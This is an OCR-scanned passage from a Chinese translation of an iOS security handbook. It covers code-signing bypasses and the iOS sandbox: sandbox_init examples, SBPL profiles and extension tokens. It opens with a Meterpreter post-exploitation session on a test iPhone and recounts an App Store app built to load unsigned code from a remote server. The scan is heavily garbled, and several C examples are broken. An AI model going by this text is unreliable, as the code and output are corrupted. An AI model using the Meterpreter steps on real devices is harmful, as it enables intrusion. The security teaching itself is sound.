41333/-wx-wx-wx 68 di Tue Aug 
100000/--------- 0 于 了 Thu Aug 
40775/rwxrwxr-x 1258 dir Tue Aug 
40775/rwxrwxr-x 68 dir Thu Aug 
40775/rwxrwxr-x 646 dir Tue Aug 
40755/rwxr-xr-x 102 dir Thu Aug 
40755/rwxr-xr-x 102 dir Tue Aug 
41775/rwxrwxr-x 68 dir Thu Aug 
40555/r-xr-xr-x 1625 dir Thu Sep 
40755/rwxr-xr-x 544 dir Thu Sep 
40755/rwxr-xr-x 136 dir Thu Sep 
40755/rwxr-xr-x 476 dir Tue Aug 
40755/rwxr-xr-x 272 dir Tue Aug 
40755/rwxr-xr-x 952 dir Thu Sep 
meterpreter > getpid 
Current pid: 518 
meterpreter > getuid 
Server username: mobile 
meterpreter > ps 
Process list 

PID Name Path 

0 kernel_task 

ME launchd 

生 朗 UserEventAgent 

13 notifyd 

14 configd 

16 syslogd 

lg CommCenterClassi 

20 lockdownd 

25 powerd 

28 locationd 

30 wifid 

32 ubd 

45 mediaserverd 

46 mediaremoted 

47 mDNSResponder 

49 imagent 

50 iapd 

52 fseventsd 

53 fairplayd.N90 

59 apSsd 

60 aggregated 

65 BTServer 

57 SpringBoard 

74 networkd 

85 lsd 

88 MobileMail 

90 MobilePhone 


30 
30 
25 
30 
25 
30 
25 
30 
25 
01 
01 
01 
30 
30 
01 


图 灵 社 区 会 员 cham1985 专 享 尊重 版 权 





OSs 
:41 
He 
:36 
22: 


05 
20 
05 
05 


05 
20 


05 


D5: 
05: 


41 


08 


27 
22' 
:36 
3 二 
06: 
05: 
05: 
237 


16 


03 
S55 
S55 


18 
59 


2011 
2011 
2 和 
2011 
2011 
2011 
2011 
2 下 
2 
下 于 
2011 
2011 
2011 
2011 
二 下 


.Trashes 
= 下 于 二 全 
Applications 
Developer 
Library 
System 
bin 

cores 

dev 

etc 
private 
sbin 

usr 

Var 
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113 Preferences 

312 TheDailyHoff 

422 SCHelper 

426 Music~iphone 

站 3 ptpd 

437 afcd 

438 atc 

442 notification pro 
480 notification pro 
499 springboardservi 
518 test-dyld 

519 sandboxd 

520 securityd 


meterpreter > sysinfo 

Computer: Test-iPhone 

OS : ProductBuildVersion: 9A5313e, 

ProductCopyright: 1983-2011 Apple Inc., 

ProductName: iPhone OS, ProductVersion: 5.0, ReleaseType: Beta 
meterpreter > vibrate 

meterpreter > ipconfig 


lo0 

Hardware MAC: 00:00:00:00:00:00 
IP Address : 127.0.0.1 
Netmask * 2555.000 

en0 

Hardware MAC: 5c:59:48:56:4c:e6 
IP Address : 192.168.1.2 
Netmask 1 255.25522552.0 


4.7.3 取得 App Store 的 批准 


出 现在 iOS App Store 中 的 每 一 个 应 用 都 要 经 过 苹果 公司 的 检查 和 批准 。 我 们 很 难 弄 清 这 一 流 
程 具 体 是 如 何 操作 的 。 那 些 有 记录 的 应 用 申请 被 拒 的 情况 通常 涉及 版 权 问题 、 竞 争 问题 ， 或 是 使 
用 私有 的 API 函 数 。 虽 然 App Store 的 审批 流程 可 以 有 效 地 将 恶意 应 用 拒 之 门 外 ， 但 是 我 们 无 法 确 
切 知道 有 多 少 亚 意 应 用 在 审查 中 被 拒绝 。 

这 种 不 透明 的 流程 就 引出 了 一 个 问题 : 利用 了 本 章 介绍 的 这 些 代码 签名 bug 的 应 用 ， 是 会 通 
过 审查 流程 呢 ， 还 是 会 被 发 现 呢 ? 为 了 求证 ，Charlie Miller 提 交 了 一 个 应 用 ， 该 应 用 可 以 从 他 控 
制 的 服务 器 上 下 载 并 执行 任意 ( 未 签名 的 ) 库 。 























注意 我 们 特别 感谢 Jon Oberheide 和 Pavel Malik 为 此 提供 的 帮助 。 


该 应 用 看 上 去 是 一 个 股票 行情 查询 程序 。 不 过 ， 该 应 用 通过 函数 指针 的 方式 调用 alopen 和 
alsym， 而 非 直接 调用 它们 ，Miller 并 没有 刻意 去 隐藏 程序 要 做 些 什么 。 在 苹果 公司 的 测试 中 ， 
大 部 分 代码 都 不 会 执行 ( 因为 Miller 没 有 在 应 用 进行 调用 的 地 方 放 上 库 ), 这 些 代码 进行 了 很 多 指 
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针 操作 ， 以 RWX 权 限 对 文件 进行 map 处理， 并 进一步 加 载 库 。 我 们 来 看 图 4-11。 
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Description 


ne stock updates with this app. Configure t 





ge in real time. Red and green flashes occ 





InstaStock Support » 


iPhone Screenshots 





Free 









Requirements: Compatible with 
iPhone, iPod h,a 
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9/9/2011 10:25am 














图 4-11 


App Store 中 的 InstaStock 程 序 含有 可 以 加 载 任意 未 签名 代码 的 代码 








他 甚至 是 用 自己 的 真名 实 姓 提 交 的 该 应 用 ! 在 经 过 为 











期 一 周 的 应 用 审查 后 ,苹果 公 司 批准 




















了 该 应 用 并 让 它 在 App Store 中 上 架 了 。 显 然 ， 从 安全 角度 来 看 ，App Store 的 审查 流程 并 不 是 那 


么 彻底 。 


4.8 


小 结 


在 本 章 中 大 家 了 解 到 iOS 代 码 签名 机 制 的 重要 性 ， 并 知道 了 它 怎 么 加 大 攻击 难度 并 大 大 限制 
该 平台 上 的 恶意 软件 。 接 着 我 们 通 览 了 XNU 内 核 以 及 iOS 内 核 文件 中 实现 强制 代码 签名 的 代码 。 
然后 ， 我 们 介绍 了 代码 签名 的 例外 情况 ， 也 就 是 MobileSafari 中 的 即时 编译 ， 以 及 与 该 功能 相关 
的 所 有 代码 。 最 后 , 我 们 谈论 了 针对 代码 签名 机 制 的 一 些 攻击 , 包括 对 MobileSafari 注 入 shellcode， 
并 得 知 代码 签名 机 制 的 bug 可 以 让 攻击 者 加 载 未 签名 的 库 〈 至 少 在 该 漏洞 被 修复 之 前 是 可 行 的 )。 
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iOS 提 供 了 多 层 漏洞 攻击 缓解 机 制 。DEP〈 数据 执行 保护 ) 和 ASLR ( 地 址 空间 分 布 随 机 化 ) 
加 大 了 人 们 获取 代码 执行 权 的 难度 , 不 过 还 需要 有 其 他 机 制 限制 恶意 代码 所 造成 的 破坏 。 脱胎 自 
Mac OS X 中 类 似 系统 的 iOS 沙 盒 机 制 ， 就 提供 了 一 种 限制 进程 行为 的 方法 。 

沙 盒 的 目的 在 于 , 通过 提供 接口 约束 进程 行为 , 从 而 限制 代码 执行 后 的 行为 。 假 设 有 一 个 PDF 
阅读 应 用 , 该 应 用 的 一 个 子 系统 会 解析 打开 的 文件 ， 生 成 内 部 的 表示 形式 。 而 男 一 个 子 系统 则 负 
责 利用 这 种 内 部 表示 , 将 该 文档 泻 染 在 屏幕 上 。 因 为 这 个 负责 解析 的 子 系统 在 处 理 用 户 提 供 的 输 
入 时 最 容易 受到 攻击 , 所 以 除了 输入 文件 之 外 它 不 需要 访问 其 他 内 容 。 通过 禁止 该 子 系统 打开 其 
他 文件 、 执 行 其 他 程序 或 使 用 网 络 , 我 们 就 限制 了 攻击 者 在 代码 执行 后 的 行为 。 理 论 上 讲 , 这 很 
容易 实现 ， 不 过 在 实际 应 用 中 ,约束 进 程 的 预期 行为 是 很 难 而 且 很 容易 出 错 的 。 

本 章 要 讨论 iOS 沙 盒 的 设计 与 实现 。 通 过 一 步 步 了 解 iOS 用 来 为 给 定 进 程 配置 和 实施 描述 文件 
的 代码 ， 大 家 将 知道 如 何 用 iOS 沙 盒 实施 系统 执行 更 高 级 的 审计 。 本 章 的 大 部 分 内 容 都 将 讨论 该 
系统 未 正式 记录 的 那些 部 分 。 



































5.1 理解 沙 盒 


苹果 的 沙 盒 最 早出 现在 Mac OS X 中 , 一 开始 代号 为 Seatbelt( 安全 带 ), 就 像 第 4 章 讨论 过 的 AMFI 
那样 ， 它 被 实现 为 TrustedBSD 强 制 访问 控制 (MAC ) 框架 的 一 个 策略 模块 。 苹 果 公 司 将 TrustedBSD 
从 FreeBSD 移 植 到 了 XNU 内 核 中 。 除 了 TrustedBSD 系 统 对 挂 钧 和 策略 管理 引擎 的 调用 之 外 ， 沙 盒 杠 
架 还 提供 了 可 从 用 户 空间 配置 、 与 各 个 进程 相对 应 的 描述 文件 ， 从 而 显著 增加 了 其 价值 。 

沙 盒 由 以 下 几 个 部 分 组 成 : 
口 一 些 用 于 初始 化 和 配置 沙 盒 的 用 户 空 间 库 函数 ; 
口 用 来 处 理 内 核 日 志和 存放 预 置 配置 的 Mach 服 务 器 ; 
口 利用 TrustedBSD API 实 施 单独 策略 的 内 核 扩展 ; 
口 为 在 实施 过 程 中 评估 某 些 策 略 限制 提供 正则 表达 式 引擎 的 内 核 支持 扩展 。 

图 $-1 展 示 了 这 些 组 成 部 分 之 间 的 关系 。 

为 应 用 实施 沙 盒 机 制 首 先 要 调用 1ibsystem 国 数 sandqbox_init。 该 图 数 利 用 libsanda 
box.dylib 库 把 人 们 可 以 理解 的 策略 定义 ( 以 “不 允许 访问 /opt/sekret 目 录 下 的 文件 ”这 样 的 形 
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式 描述 的 规则 ) 转换 成 内 核 需要 的 二 进 制 格式 。 该 二 进 制 格式 会 被 传递 给 由 TrustedBSD 子 系统 处 
理 的 mac_svyscal11 系 统 调 用 。 而 TrustedBSD 会 把 沙 盒 初 始 化 请 求 传递 给 sandqbox .kext 内 核 扩展 
进行 处 理 。 这 一 内 核 扩 展会 为 当前 进程 安装 沙 盒 描述 文件 规则 。 该 过 程 完成 后 会 有 表示 处 理 成 功 
的 返回 值 被 传 回 内 核 。 








图 $-1 IOS 沙 盒 的 组 成 部 分 


一 且 完 成 沙 盒 的 初始 化 ，TrustedBSD 层 钩 挂 的 很 多 郴 数 调用 会 经 过 Sandbox.kext 实 施 策 
略 。 该 内 核 扩 展会 根据 系统 调用 的 不 同 决定 为 当前 进程 实施 哪些 规则 。 某 些 规 则 〈 比如 之 前 提 过 
的 拒绝 对 /optsekret 路 径 下 文件 的 访问 ) 要 求 模 式 匹 配 的 支持 。Sandbox.kext 会 从 
AppleMatch.kext 引 入 函数, 对 这 些 系统 调用 参数 和 策略 规则 使 用 的 模式 进行 正则 表达 式 匹 配 。 
例如 ， 传 递 给 open() 的 路 径 是 否 匹 配 要 拒绝 访问 的 路 径 /opt/sekret/.*? 最 后 的 组 成 部 分 
sandboxd 是 侦 听 Mach 消 息 的 ， 这 些 消 息 运 载 着 记录 和 日 志 信 息 ( 比如 要 检查 哪些 操作 )， 以 及 
对 硬 编码 到 内 核 中 的 预 置 描述 文件 的 请 求 ( 比如 “阻止 所 有 对 网 络 的 使 用 ”或 “不 允许 进行 计算 
之 外 的 任何 操作 ”)。 

5.2 节 将 会 更 为 详细 地 介绍 刚刚 提 到 的 各 个 组 成 部 分 。 这 里 我 们 从 用 户 空间 一 直 探 究 到 内 核 
组 件 。 在 整个 讨论 中 , 我们 都 会 用 到 从 iPhone3,1_5.0_9A334 固 件 中 解压 出 的 二 进 制 文件 。 解压 内 
核 缓存 与 根 文件 系统 ( 对 应 day1d 缓 存 ) 的 细节 参见 第 10 章 。 对 XNU 内 核 的 任何 讨论 都 用 到 了 对 
该 二 进 制 固 件 以 及 xnu-1699 .24 .8 开源 代码 的 分 析 。 该 版 xnu 源 是 可 获取 的 与 所 讨论 固件 最 接近 
的 版 本 了 。 此 外 ， 大 家 还 可 以 在 本 书 配套 网 站 www.wiley.com/go/ioshackershandbook 上 下 载 本 章 
的 示例 代码 。 
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5.2 ”在 应 用 开发 中 使 用 沙 盒 


随 着 App Store 的 建立 和 Mac OSX 10.7Lion 的 发 布 , 更 多 与 OS 使 用 的 沙 盒 扩展 有 关 的 文献 也 
相继 出 现 。 在 Mac OSX 10.7 之 前 ，iOS 沙 盒 要 比 Mac OS X 沙 盒 具有 更 多 的 功能 ,但 公开 的 信息 却 
少 得 可 怜 。Application Sandbox Design Guide”( 应 用 沙 盒 设 计 指 南 ) 填补 了 这 一 空白 ， 而 且 苹 果 
公司 关注 了 iOS 中 的 诸多 差异 。 虽 然 这 一 设计 指南 是 从 较 高 的 层面 着 眼 ， 但 它 介 绍 的 概念 还 是 非 
常 实用 的 。 

iPhone 5.0SDK 的 sandbox.h 头 文件 中 含有 沙 盒 的 用 户 空 间接 口 。 这 里 的 例子 首先 从 sandqbox_ 
init、 sandbox init with parameters 和 sandbox _ init with extensions 这 3 个 用 于 初 
始 化 沙 盒 的 函数 开始 介绍 。 

sandbox_init 了 因数 会 在 给 定 描述 文件 情况 下 为 调用 它 的 进程 配置 沙 盒 。sandqbox_init 
接受 的 参数 包括 一 个 描述 文件 、 一 组 标志 和 一 个 用 于 存储 错误 信息 指针 的 输出 参数 。 根 据 传递 
给 该 函数 的 标志 的 不 同 ,我们 有 不 同方 式 来 提供 该 描述 文件 (或 者 说 限制 进程 的 规则 集 )。 该 函 
数 唯一 公开 支持 的 标志 是 SANDBOX_NAMED， 它 需要 一 个 在 描述 文件 参数 中 传递 的 字符 串 ,， 选 择 
诸如 “no-internet” 这 样 的 内 置 描 述 文件 。 这 里 的 示例 程序 会 利用 该 选项 限制 衍生 的 shell 使 用 
特 网 : 


#include <stdio.h> 
#include <sandbox.h> 



































int main(int argc, char *argv[]) { 
主攻 在 闪光 7 
Char *errbuff; 





//TV = sandbox_ init(kSBXProfileNoInternet, SANDBOX_ NAMED BUILTIN, &errbuff); 
rv = sandbox_ init("nointernet", SANDBOX NAMED BUILTIN, &errbuff); 
(Ev = 0) { 
fprintf(stderr, "sandbox init failed: %s\n", errbuff); 
sandbox_free_error (errbuff).; 
} else { 
printf("pid: %d\n", getpid()); 
putenv ("PS1=[SANDBOXED] \\h:\\w \\u\\$ "); 
execl("/bin/sh", "sh", NULL); 








} 
return 0; 
} 
在 运行 该 示例 之 前 , 请 确保 自己 在 越狱 过 的 设备 上 用 inetutils 包 安装 了 ping 程 序 。 要 执行 
/bin/ping， 你 还 需要 使 用 /chmod -s /bin/ping 命 令 删 除 烙 滞 位 (sticky bit )。 下 面 的 内 容 反 
上 映 了 上 述 程序 构建 的 沙 盒 按 预 期 阻止 了 ping 请 求 ; 

















GD https://developer.apple.com/library/mac/#documentation/Security/Conceptual/AppSandboxDesignGuide/AboutApp 
Sandbox/AboutAppSandbox.html。 


译 者 注 
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iFauxn:~/ioshh root# ./sbl 

pid: 5169 

[SANDBOXED] iFauxn:~/ioshh root# ping eff.org 

PING eff.org (69.50.232.52): 56 data bytes 

ping: sendto: Operation not permitted 

^C--- eff.org ping statistics --- 

0 packets transmitted, 0 packets received, 

[SANDBOXED] iFauxn:~/ioshh root# exit 

iFauxn:~/ioshh root# ping eff.org 

PING eff.org (69.50.232.52): 56 data bytes 

64 bytes from 69.50.232.52: icmp_seq=0 ttl=46 time=191.426 ms 
^C--- eff.org ping statistics --- 

1 packets transmitted, 1 packets received, 0% packet loss 
round-trip min/avg/max/stddev = 191.426/191.426/191.426/0.000 ms 
iFauxn:~/ioshh root# 


大 家 要 注意 这 个 示例 程序 注释 掉 的 那 行 , 此 行使 用 了 ksBXProfileNoInternet 常 量 作为 描 
述 文 件 的 名 称 。 而 iDOS 沙 盒 不 兼容 头 文件 中 定义 的 常量 。 例 如 ,ksBXProfileNoInternet 在 iOS 
和 Mac OS XX 中 都 会 被 解析 为 “no-internet”。 但 不 巧 的 是 ， 在 iOS 中 ， 这 个 描述 文件 的 名 称 应 该 是 
“nointernet” 。 

除 具 名 的 内 置 描述 文件 外 ，sandbox_init 还 支持 利用 源 于 Scheme 语 言 的 领域 特定 语言 
Sandbox Profile Language (SBPL ) 指定 自 定义 的 细 粒 度 限 制 。 利 用 SANDBOX_NAMED_FEXTERNAL 
标志 ，sandqbox_init 会 希望 SBPL 脚 本 文件 的 路 径 以 参数 的 形式 传递 。 如 果 该 路 径 不 是 绝对 路 
径 ， 该 相对 路 径 就 会 被 加 上 以 下 3 个 基本 路 径 前 级 ， 尝 试 3 个 不 同 的 位 置 .: 

__ cstring:368FB90A aLibrarySandbox DCB "/Library/Sandbox/Profiles",0 


__ cstring:368FB924 aSystemLibraryS DCB "/System/Library/Sandbox/Profiles",0 
__ cstring:368FB945 aUsrShareSandbo DCB "/usr/share/sandbox",0 


除了 SANDBOX_NAMED_EXTERNAL， 标志 的 值 0 还 可 以 与 描述 文件 参数 中 的 SBPL 脚 本 一 起 直 
接 传递 给 sanqbox_init。 苹 果 公 司 并 未 提供 SBPL 的 文档 ， 不 过 Scheme 语言 本 身 的 完整 语言 定 
义 却 很 容易 从 libsandbox.dylib 文 件 ( 可 从 固件 中 的 dyld 缓 存 中 得 到 ) 中 提取 出 来 。 好 在 fG! 编 纂 的 
Apple Sandbox Guide" 为 Mac OS X 中 实现 的 SBPL 提 供 了 文档 。 这 份 指南 的 大 部 分 内 容 适 用 于 iOS ， 
不 过 没有 涉及 SBPL 某 些 比较 新 的 特性 〈 比如 扩展 过 滤器 )。 

我 们 使 用 的 固件 中 还 有 一 个 SBPL 脚 本 (扩展 名 为 .sb ) 的 示例 : /usrshare/sandbox 目 录 下 的 
ftp-proxy.sb 文 件 。 下 面 我 们 摘录 了 该 描述 文件 的 部 分 内 容 ， 让 大 家 在 继续 学 习 完 整 的 例子 之 前 对 
该 格式 有 初步 了 解 : 


(deny default) 







































































(allow file-read-data 
(literal "/dev/pf") 
(literal "/dev/random") 
(literal "/private/etc/master.passwd")) 





GD http://revers.put.as/2011/09/14/apple-sandbox-guide-v1-0/。 一 一 译 者 注 
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(allow file-read-metadata 
(literal "/etc")) 


(allow file-write-data 
(literal "/dev/pf")) 


这 种 描述 文件 语言 是 非常 直观 的 。 该 脚本 将 默认 操作 设置 为 拒绝 任何 访问 , 锁定 了 应 用 该 描 














容 (这 可 能 是 因为 FTP 代 码 进行 身份 验证 所 需要 的 )。 要 自行 尝试 沙 盒 描述 文件 ， 我 们 可 以 创建 
如 下 描述 文件 限制 对 /tmp 目 录 下 两 个 特定 文件 的 访问 : 

(version 1) 

(allow default) 


(deny file-read-data 
(literal "/private/var/tmp/can w")) 


(deny file-write-data 
(literal "/private/var/tmp/can _r")) 


要 测试 该 描述 文件 ,我 们 可 以 复制 之 前 拒绝 因特网 访问 的 例子 ， 并 把 对 sangbox_init 的 调 
用 改 为 使 用 SANDBOX_NAMED_EXTERNRAL 选 项 : 











rv = sandbox_ init("sb2", SANDBOX NAMED EXTERNAL, &errbuff) ; 

大 家 还 需要 把 之 前 提 到 的 那个 .sb 脚本 复制 到 /usr/share/sandbox 目 录 ( 或 是 与 查找 路 径 类 似 
的 目录 ) 中 , 或 是 在 sandbox_init 参 数 中 给 出 该 脚本 的 绝对 路 径 。 这 里 的 记录 展示 了 这 一 自 定 
义 SBPL 脚 本 根据 路 径 限 制 对 文件 的 访问 : 


iFauxn:~/ioshh root# echo "w" > /private/var/tmp/can w 
iFauxn:~/ioshh root# echo "r" > /private/var/tmp/can r 
iFauxn:~/ioshh root# ./sb2 

pidy 5435 

SANDBOXED] iFauxn:~/ioshh root# cat /private/var/tmp/can _w 
cat: /private/var/tmp/can w: Operation not permitted 
SANDBOXED] iFauxn:~/ioshh root# cat /private/var/tmp/can _r 


























r 
SANDBOXED] iFauxn:~/ioshh roo echo "IOSHH" >> /private/var/tmp/can _w 
SANDBOXED] iFauxn:~/ioshh roo echo "IOSHH" >> /private/var/tmp/can_r 
sh: /private/var/tmp/can r: Operation not permitted 

SANDBOXED] iFauxn:~/ioshh root# exit 

iFauxn:~/ioshh root# 


不 出 所 料 ， 我 们 对 can_w 的 读 访问 被 阻止 , 但 可 以 对 其 进行 写 访问 。 而 can_r 则 正好 是 相反 
可 以 读 但 不 可 以 写 。 

与 sandbox_init 一 样 ， 其 他 两 个 用 于 沙 盒 初 始 化 的 函数 也 接受 相同 的 3 个 参数 。 除 此 之 外 ， 
它们 还 会 接受 指向 某 个 字符 数组 的 第 四 个 参数 。 在 为 该 SBPL 脚 本 赋值 时 ， 我 们 要 使 用 
init_sandbox_with_parameters 将 一 列 参数 传递 给 Scheme 解释 器 。 就 像 C 语 言 的 预 处 理 咒 那 
样 ， 这 一 特性 是 很 实用 的 。 所 有 的 参数 都 必须 在 初始 化 时 指定 。 





























的 
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通过 init_sandbox_with_extensions 传 递 到 最 后 一 个 初始 化 函数 中 的 扩展 与 之 前 提 到 


的 参数 有 很 大 不 同 。 扩 展 通 常 是 基本 路 径 ， 





而 且 可 能 被 动态 地 添加 到 进程 上 。 与 参数 不 同 的 是 ， 








扩展 的 逻辑 是 内 置 在 内 核 执行 中 的 。 每 个 进程 都 维护 着 当前 存放 的 扩展 字符 串 的 清单 ， 当 沙 盒 在 





描述 文件 规则 中 遇 到 某 些 SBPL 过 滤器 
extensions 的 作用 是 立刻 指定 进程 所 需 的 











时 ， 就 会 查阅 这 一 清单 。init_sandbox with_ 


扩展 清单 。 





大 家 可 以 通过 两 步 操作 动态 地 将 扩展 添加 到 进程 上 。 首 先 , 我 们 以 要 添加 的 路 径 以 及 存放 输 
出 标记 (output token ) 的 指针 为 参数 调用 sandbox_issue_extension， 从 而 签发 扩展 。 接 着 ， 
当 使 用 sandbox_consume_extension 在 进程 中 安装 该 扩展 后 ,该 标记 就 会 被 销毁 。 签 发 扩展 

















的 进程 与 销毁 扩展 的 进程 不 一 定 是 同一 进程 。 例 如 ， 与 受 沙 盒 限 制 的 子 进程 进行 通信 的 父 进程 ， 


就 可 能 根据 内 部 策略 为 子 进程 签发 扩展 。S 





BPL 提 供 了 一 条 限制 sandbox_issue_extension 操 


作 的 途径 。 如 果 没 有 这 种 限制 ， 受 沙 盒 约 束 的 子 进程 就 可 以 自行 签发 任何 扩展 ,让 这 种 特性 变 得 


毫 无 意义 。 


下 面 再 看 一 个 展示 扩展 之 用 途 的 例子 : 


#include <stdio.h> 
#include <sandbox.h> 


int main(int argc, char *argv[]) 
int rv; 
char sbl[] 


{ 


version 1)\n" 
allow default) An 


( 
( 
( 
( 


(regex #\" 


deny file-issue-extension*)\n 
deny file-read-data\n" 


'/private/var/tmp/container/" 


(LOs9Jt)/ NT Nn 
"(allow file-read-data\n" 


(regex 


char *errbuff; 


char *token; 
token = NULL; 


printf("Issued extension token for 


sandbox_issue extension("/private/var/tmp/container/1337", 


(require-all\n" 
(extension) \n" 


#\"/private/var/tmp/container/" 
"(LoLt) NTINIi: 


&token); 


"\"/private/var/tmp/container/1337\":\n"); 


token); 


printf("sandbox issue extension failed\n"); 


Ey 三 

if (rv == 0 && token) { 
Drintf(™ Se\r™, 

} else { 

} 


const char *exts![] 


{ argv[1] 


站 


printf("Applying sandbox profile:\n"); 


Brintf (Se, 
EN 


sb); 
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printf ("With extensions: { \"%s\" }\n", exts[0]); 
BrintE ("NY) 


rv = sandbox_ init with extensions(sb, 0, exts, &errbuff); 

A (Ey 0) 到 
fprintf(stderr, "sandbox_ init failed: %Ss\n", errbuff); 
sandbox_free_ error (errbuff).; 

} else { 
putenv ("PS1=[SANDBOXED] \\h:\\w \\u\\$ "); 





printf("Attempting to issue another extension after" 
"applying the sandbox profile...\n"); 
char *token2 = NULL; 
rv = sandbox_issue_ extension\( 
"/private/var/tmp/container/1337", &token2); 
if (rv == 0 && token) { 
printf("Issued extension token for " 
"\"/private/var/tmp/container/1337\":\n"); 
printf(" %Ss\n", token); 
} else { 
printf("sandbox_ issue extension failed\n"); 


} 


system("/bin/sh"); 
printf("\nConsuming the extension, then starting another " 
"shell...\n\n"); 
sandbox_consume_ extension("/private/var/tmp/container/1337", token); 
system("/bin/sh"); 
} 


return 0; 

} 

在 这 个 例子 中 , 我 们 的 目标 是 创建 一 个 描述 文件 ,以 便 在 运行 时 添加 允许 添加 的 子路 径 。 要 做 
到 这 一 点 ， 我 们 首先 要 拒绝 对 /private/vartmp/container 目 录 下 包含 数字 的 路 径 的 读数 据 访 问 。 在 拒 
绝 读数 据 之 后 ， 我 们 又 加 上 了 一 条 允许 读数 据 的 规则 ， 只 有 目标 路 径 既 在 进程 扩展 下 ， 又 在 
/private/vartmp/container 下 ， 才 人 允许 读数 据 访 问 。 我 们 还 要 拒绝 对 sandbox_issue_extension 阴 
数 的 访问 。 在 初始 化 沙 盒 之 前 , 我 们 要 为 1337 子 目录 签发 第 一 个 扩展 。 返 回 的 标记 被 保存 下 来 。 然 
后 ， 沙 盒 就 会 随 着 从 第 一 个 命令 行 参 数 接受 的 一 个 扩展 初始 化 。 在 运行 shell 之 前 , 大 家 可 以 尝试 在 
沙 盒 下 签发 扩展 , 从 而 证 明 该 描述 文件 拒绝 了 对 sandqbox_issue_extension 国 数 的 访问 。 在 退出 
第 一 个 shell 后 ， 这 个 1337 扩 展 就 会 被 销毁 并 运行 一 个 新 shell。 下 面 是 该 程序 的 运行 情况 记录 : 


iFauxn:~/ioshh root# ./sb4 /private/var/tmp/container/5678 





























Issued extension token for "/private/var/tmp/container/1337": 
000508000d0000000000000000021f002f707269766174652f7661722f746dq70 
2£636f6e7461696e65722£31333337000114007d00c6523ef92e76c9c0017fe8 
£74ad772348e00 


Applying sandbox profile: 
(version 1) 
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(allow default) 
(deny file-issue-extension*) 
(deny file-read-data 


(regex #"/private/var/tmp/container/([0-9]+)/.*")) 


(allow file-read-data 
(require-all 
(extension) 
(regex #"/private/var/tmp/container/([0-9]+) 


With extensions: { "/private/var/tmp/container/5678" } 


/sy)) 


Attempting to issue another extension after applying the sandbox profile... 


sandbox_ issue extension failed 


sh-4.0# cat / private/var/tmp/container/1234/secret 
cat: ./container/1234/secret: Operation not permitted 
Sh-4.0# cat /private/var/tmp/container/5678/secret 


Dr. Peter Venkman: Human sacrifice, dogs and cats living together 


... mass hysterial! 

sh-4.0# cat /private/var/tmp/container/1337/secret 
cat: ./container/1337/secret: Operation not permitted 
sh-4.0# exit 





Consuming the extension, then starting another shell... 


Sh-4.0# cat /private/var/tmp/container/1234/secret 
cat: ./container/1234/secret: Operation not permitted 
Sh-4.0# cat /private/var/tmp/container/5678/secret 


Dr. Peter Venkman: Human sacrifice, dogs and cats living together... mass 


hysteria! 
Sh-4.0# cat /private/var/tmp/container/1337/secret 


Dr. Peter Venkman: You're not gonna lose the house, everybody has three 


mortgages nowadays. 
Sh-4.0# exit 
iFauxn:~/ioshh roott# 











iFauxn:~/ioshh root# cat /private/var/tmp/container/1234/secret 


Dr. Ray Stantz: Total protonic reversal. 
iFauxn:~/ioshh root# 





这 段 记录 反映 的 程序 执行 过 程 中 发 生 了 什么 ” 它 和 所 创建 的 描述 文件 有 何 关系 ? 在 这 段 记 
录 中 ， 程 序 开 始 时 的 命令 行 参数 是 /private/var/tmp/container/5678。 这 一 参数 会 被 用 在 
对 sandbox_init_with extensions 的 调用 中 。 大 家 看 到 的 第 一 个 输出 是 sandbox_issue_ 





extension 的 结果 。 该 扩展 是 为 1337 子 目录 签发 的 ， 而 且 这 一 过 程 








是 在 沙 盒 初 始 化 之 前 进行 的 。 





在 sandbox_init _with _ extensions 的 输出 证 实 使 用 了 哪个 描述 文件 后 ， 你 就 会 看 到 


sandbox_issue_extension 如 预期 那样 失败 。 在 第 一 个 shell 中 ， 








3 次 读数 据 尝 试 中 唯一 成 功 的 

















就 是 在 5678 子 目录 下 的 那 次 ， 而 5678 子 目录 是 在 初始 化 期 间作 为 扩展 添加 的 。 第 二 个 shell 是 在 
1337 扩 展 被 销毁 后 执行 的 。 不 出 所 料 ， 对 1337 和 5678 的 读 操 作 都 得 到 了 允许。 在 退出 沙 盒 之 后 ， 














你 就 会 验证 1234 文 件 是 存在 而 且 可 读 的 。 这 个 例子 说 明了 扩展 是 如 何 用 来 在 沙 盒 初始 化 之 后 动态 
修改 沙 盒 描述 文件 的 。 如 果 这 还 不 够 明确 的 话 ， 在 你 学 习 5.3.3 节 时 应 该 会 更 容易 理解 。 
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这 里 的 例子 展示 了 已 公开 的 用 于 初始 化 沙 盒 和 操控 沙 盒 配置 的 函数 。 第 一 个 例子 说 明了 预 置 
的 具名 描述 文件 的 用 途 。 大 家 还 看 到 了 SBPL 语 言 以 及 自 定 义 沙 盒 描述 文件 的 构造 。 最 后 的 例子 
展示 了 如 何 用 扩展 在 沙 盒 初 始 化 后 动态 修改 访问 权限 。 在 本 章 随后 的 内 容 中 ， 大 家 还 会 了 解 到 
App Store 应 用 和 平台 应 用 ( 比如 MobileSafari ) 是 如 何 与 沙 盒 系统 进行 交互 的 ， 出 人 意料 的 是 ， 
这 两 类 应 用 都 没有 使 用 目前 为 止 我 们 所 列举 的 接口 ! 在 讨论 这 些 应 用 之 前 ，5.3 节 将 让 大 家 详细 
了 解 沙 盒 实施 机 制 的 实现 。 




















5.3 理解 沙 盒 的 实现 


沙 盒 是 由 内 核 与 用 户 空间 组 件 构成 的 。5.2 节 讨论 了 沙 盒 初始 化 过 程 中 对 库 的 调用 ， 而 本 市 
则 解释 将 之 前 讨论 的 函数 调用 与 驻 留 在 内 核 期 间 由 沙 盒 内 核 扩展 暴 露 的 系统 调用 接口 紧密 联系 
的 过 程 。 除 了 暴露 配置 接口 外 ， 该 内 核 模 块 还 扮演 着 “看 门人 ”的 角色 。 它 会 检查 进程 请 求 的 操 
作 , 并 根据 与 进程 关联 的 沙 盒 描述 文件 对 这 些 操 作 请 求 进行 评估 。 大 家 将 会 详细 了 解 这 一 内 核 扩 
展 ， 理 解 XNU 内 核 的 TrustedBSD 组 件 的 使 用 方式 。 最 后 ， 我 们 将 引领 你 过 一 遍 沙 盒 TustedBSD 
策略 处 理 的 系统 调用 流程 。 




















5.3.1 理解 用 户 空 间 库 的 实现 


要 解释 用 户 空间 库 的 实现 , 我 们 就 要 从 公开 的 函数 追溯 到 1ibsystem 中 的 系统 调用 。 要 获得 
切入 点 并 不 难 ， 大 家 可 以 使 用 iPhone SDK 中 的 ayldinfo 实 用 程序 (Mac OS X 版 的 也 可 以 )。 这 
样 你 就 可 以 确定 为 sandbox_init 符 号 链接 的 共享 库 是 哪个 , 并 从 那里 开始 进行 道 向 追踪 。 本 章 
第 一 个 例子 的 输出 如 下 所 示 : 


pitfall:sbl qions dyldinfo -1Lazy bindq sbl 
